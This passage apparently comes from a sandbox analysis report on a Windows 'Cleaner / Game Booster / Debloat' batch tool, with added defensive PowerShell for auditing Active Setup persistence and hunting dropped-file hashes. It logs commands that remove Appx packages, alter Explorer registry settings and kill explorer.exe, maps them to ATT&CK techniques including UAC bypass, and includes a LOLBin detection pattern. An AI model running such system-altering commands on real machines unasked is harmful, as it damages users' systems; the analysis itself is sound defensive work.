  PID:2196  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:4256  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *zune* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:3604  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *Sway* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:688   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *CommsPhone* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:400   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *ConnectivityStore* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:2928  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:100   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *Facebook* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:1848  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *Twitter* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:2588  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *Drawboard PDF* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:1052  C:\Windows\System32\reg.exe  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f
  PID:4468  C:\Windows\System32\reg.exe  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f
    - Modifies visiblity of hidden/system files in Explorer
  PID:2644  C:\Windows\System32\reg.exe  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f
    - Modifies visibility of file extensions in Explorer
  PID:1980  C:\Windows\System32\taskkill.exe  taskkill /f /im explorer.exe
    - Kills process with taskkill
  PID:3228  C:\Windows\explorer.exe  explorer.exe
    - Boot or Logon Autostart Execution: Active Setup
    - Enumerates connected drives
    - Checks SCSI registry key(s)
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  PID:3592  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  PID:1736  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  PID:3796  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:1452  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 1 " nul
  PID:2844  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:4612  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Cleaner " nul
  PID:4512  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:4312  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 2 " nul
  PID:4868  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:936   C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Game Booster " nul
  PID:3268  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:3476  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 3 " nul
  PID:2576  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 7 " nul
  PID:400   C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:1720  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Debloat " nul
  PID:1604  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
PID:3488  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious use of SetWindowsHookEx
PID:1464  C:\Windows\explorer.exe  explorer.exe
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
PID:1248  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious use of SetWindowsHookEx
PID:4796  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
PID:4416  C:\Windows\explorer.exe  explorer.exe
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of SendNotifyMessage
PID:3660  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
PID:4700  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
PID:2772  C:\Windows\explorer.exe  explorer.exe
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
PID:4392  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious use of SetWindowsHookEx
PID:2468  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
PID:4436  C:\Windows\explorer.exe  explorer.exe
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
PID:3368  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious use of SetWindowsHookEx
PID:2648  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
PID:508  C:\Windows\explorer.exe  explorer.exe
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
PID:2880  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3792
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
PID:4132
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4332
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4672
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4512
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3148
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1948
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:3608
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3792
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:976
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:536
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:2680
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3132
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1604
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4184
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:984
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2988
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3820
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3700
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4280
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3436
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4468
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2712
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4192
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1736
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5104
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3944
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1784
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4080
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:548
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4976
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2072
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:424
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Active Setup (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Active Setup (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Hide Artifacts (3): Hidden Files and Directories (3)
- Impair Defenses (1): Disable or Modify Tools (1)
- Modify Registry (5)
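The Active Setup persistence hits above are all raised on explorer.exe creating subkeys under HKCU\Software\Microsoft\Active Setup\Installed Components. That is what explorer.exe does at every logon: it walks the HKLM copy of Installed Components, runs the StubPath of any component whose HKCU entry is missing or older, and then writes the HKCU entry to record that it ran. The HKCU key creation by itself is therefore expected behaviour; what matters is whether the HKLM side now contains a component an attacker added. The following PowerShell is an added triage check, not part of the sandbox output or the sample, that lists HKLM Active Setup components whose stub points outside Windows or Program Files, launches a script host, or has not yet run for the current user. The trusted-root list and the LOLBin pattern are assumptions chosen for illustration.

```powershell
# Added example (not from the report): audit Active Setup for attacker-added components.
# Active Setup: explorer.exe compares HKLM\...\Installed Components\<id> with the HKCU copy
# at logon and executes StubPath as the user when the HKCU entry is missing or older.

$hklm   = 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components'
$hklm32 = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components'
$hkcu   = 'HKCU:\Software\Microsoft\Active Setup\Installed Components'

# Assumption: legitimate stubs live under these roots. Tighten or extend for your estate.
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
# Assumption: script/LOLBin hosts in a StubPath are worth a look regardless of location.
$hostPattern  = 'powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32|msiexec'

function Get-ActiveSetupComponent {
    param([string]$Root)
    if (-not (Test-Path -Path $Root)) { return }
    Get-ChildItem -Path $Root -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Component   = $_.PSChildName
            Name        = $p.'(default)'
            StubPath    = $p.StubPath
            Version     = $p.Version
            IsInstalled = $p.IsInstalled
        }
    }
}

# Index the per-user copy so each machine component can be matched by id.
$user = @{}
Get-ActiveSetupComponent -Root $hkcu | ForEach-Object { $user[$_.Component] = $_ }

$machine = @(Get-ActiveSetupComponent -Root $hklm) + @(Get-ActiveSetupComponent -Root $hklm32)

foreach ($c in $machine) {
    if (-not $c.StubPath)       { continue }   # nothing to execute
    if ($c.IsInstalled -eq 0)   { continue }   # component explicitly disabled

    $reasons = @()

    # First token of the command line, quoted or not, with environment variables expanded.
    $exe = if ($c.StubPath -match '^\s*"([^"]+)"') { $Matches[1] } else { ($c.StubPath -split '\s+')[0] }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)

    $trusted = $trustedRoots | Where-Object { $exe.StartsWith($_, 'OrdinalIgnoreCase') }
    if (-not $trusted)                     { $reasons += "stub outside trusted roots: $exe" }
    if ($c.StubPath -match $hostPattern)   { $reasons += 'stub launches a script/LOLBin host' }

    $u = $user[$c.Component]
    if (-not $u) {
        $reasons += 'no HKCU entry: stub runs at next logon for this user'
    } elseif ([string]$c.Version -ne [string]$u.Version) {
        $reasons += "HKLM version '$($c.Version)' differs from HKCU '$($u.Version)' (re-runs when HKLM is higher)"
    }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Component = $c.Component
            Name      = $c.Name
            StubPath  = $c.StubPath
            Reason    = $reasons -join '; '
        }
    }
}
```

Run it elevated on the affected host or against a loaded offline SOFTWARE/NTUSER.DAT hive; a component that has a StubPath but no HKCU counterpart will fire for every user who has not logged on since it was added, which is why the HKLM side, not the explorer.exe key creation flagged above, is the artefact to collect.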
Downloads
-
Filesize: 3KB
MD5: 56c43715e0e7fa58012d8a5769d8d568
SHA1: 4370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA256: 8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512: b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed
-
Filesize: 1KB
MD5: cf70f70f9c094c99b5d7b8a1fabd9513
SHA1: 6ea5b0d7a9c431d27b6c8c313ddf1289313f64cd
SHA256: 0476b6e80795f5d3cb917f6315469a157fca6318eaa7618453bce0f670157fde
SHA512: dadbf08b99245a9aa10f2bf98beb95248823dc8838cf76eb0628a011437ba5625f766c86cd0cbcb2f22ddc7cced3cae933e7202cb359a2b140790d4a0b6a8f6c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\M6JCG2RK\microsoft.windows[1].xml
Filesize: 96B
MD5: 732a32ad072ef786d816a4f85b1b6bea
SHA1: fe1945717c160ac3266f291564a003c044d409b0
SHA256: 7dd2262373fcd6ebe2ed2c6e66242c85b1434c3fe23ca92ba41ae328ce8b941e
SHA512: 55b57d5bf942f20a3557f20adeebb4c01cde4aec9d7a4fa8bfe6281fe0981773d8ce637fdbd1dc64f25abe72d75fad2a6538fadc86483ede9fdc5b59c0d36b79
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133740748476027766.txt
Filesize: 75KB
MD5: 703801b739b4e74d5e5ecd811d0a9dd7
SHA1: 35b8d5817b208942a0fe30603cadf0f35ce3f0e8
SHA256: b7876635cc3e3898e9594a5d6be9fd1125c212ac4392ee9b7789473e48be33bd
SHA512: a7619e7a827103488b6f3fa80b2162d1fb93ad5d9c13db8d18857c149ed34dbc3c7e69497c9514fe6b4c2b3a702ff1b1ed09978ddadb500b6131d8d61c4835f8
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 55KB
MD5: 76f94fe08cc7b659f2d6b8e475a74baa
SHA1: 6bee16deff8a87e3f02d4b11380da60bf976a240
SHA256: fd5967c4267c8fde06482595aff50653e801cd0cb0110a5799fa0d2c7bb0f0b1
SHA512: 1ce7656aa64d2e1809a8fb1ea2b9ffb03213b63b99330ec5a1ccd792ceae85f7d52a42e4ca1aadad45ba4a01e10a12a03b162936838fc2a57bc079211e92bb54
-
Filesize: 634B
MD5: cf04779e43afe21e2420e4fc4641c551
SHA1: 59143b29ad70180bbd90daaf12f9309eb4625fc4
SHA256: f03f052041664c4359f61f7acc64705d15d821f445af92cd74d8ddf8056f1701
SHA512: 4c712fe8ec9bbad7c34848aa46c44de62c9974f1a89fb27922868392a656c389a33e7ba63418e128524969f9c96e1ea7c39b24e77f53799d67c0b6b86df94dcb
-
Filesize: 3B
MD5: df66fa563a2fafdb93cc559deb0a38c4
SHA1: e6666cf8574b0f7a9ae5bccee572f965c2aec9cb
SHA256: 3e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351
SHA512: 34ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18
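The hashes above are the files written during the run. The two named entries sit under the Windows Search package directory and are produced by SearchApp.exe, which appears throughout the process tree, rather than by the sample, so a match on those alone is weak evidence; the six unnamed small files are the ones worth hunting for on other hosts. The following PowerShell is an added hunting snippet, not part of the report, that hashes small files under the usual user-writable staging locations and reports any whose SHA256 appears in the list. The SHA256 values are copied from the Downloads section; the search roots, the size cap and the high/low signal split are assumptions.

```powershell
# Added example (not from the report): sweep for the dropped files by SHA256.
# Hash values are taken from the Downloads section; roots and size cap are assumptions.

$iocSha256 = @(
    '8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5',  # 3KB,  unnamed
    '0476b6e80795f5d3cb917f6315469a157fca6318eaa7618453bce0f670157fde',  # 1KB,  unnamed
    '96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7',  # 60B,  unnamed
    'fd5967c4267c8fde06482595aff50653e801cd0cb0110a5799fa0d2c7bb0f0b1',  # 55KB, unnamed
    'f03f052041664c4359f61f7acc64705d15d821f445af92cd74d8ddf8056f1701',  # 634B, unnamed
    '3e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351',  # 3B,   unnamed
    '7dd2262373fcd6ebe2ed2c6e66242c85b1434c3fe23ca92ba41ae328ce8b941e',  # Search app DOMStore xml
    'b7876635cc3e3898e9594a5d6be9fd1125c212ac4392ee9b7789473e48be33bd'   # Search app AppCache txt
)
# Windows Search artefacts from the same list: matched but reported as low signal.
$lowSignal = @(
    '7dd2262373fcd6ebe2ed2c6e66242c85b1434c3fe23ca92ba41ae328ce8b941e',
    'b7876635cc3e3898e9594a5d6be9fd1125c212ac4392ee9b7789473e48be33bd'
)

# Assumption: where a .bat dropper typically stages files. Add ProgramData or C:\ for a full sweep.
$roots = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA,
           "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Desktop", $env:PUBLIC)
$maxBytes = 1MB   # largest listed artefact is 75KB; skipping big files keeps the sweep fast

$lookup = @{}
foreach ($h in $iocSha256) { $lookup[$h.ToLowerInvariant()] = $true }

function Find-DroppedFile {
    Get-ChildItem -Path $roots -File -Recurse -Force -ErrorAction SilentlyContinue |
      Where-Object { $_.Length -le $maxBytes } |
      ForEach-Object {
          $fh = Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
          if (-not $fh) { return }
          $key = $fh.Hash.ToLowerInvariant()
          if ($lookup.ContainsKey($key)) {
              [pscustomobject]@{
                  Path       = $_.FullName
                  Size       = $_.Length
                  SHA256     = $key
                  CreatedUtc = $_.CreationTimeUtc
                  WrittenUtc = $_.LastWriteTimeUtc
                  Signal     = if ($lowSignal -contains $key) { 'low (Search app artefact)' } else { 'high' }
              }
          }
      }
}

Find-DroppedFile | Sort-Object Signal, CreatedUtc | Format-Table -AutoSize
```

Keep the creation timestamps from any high-signal hit: they bound when the batch file ran on that host and give a window for pulling the matching PowerShell and scheduled-task event logs.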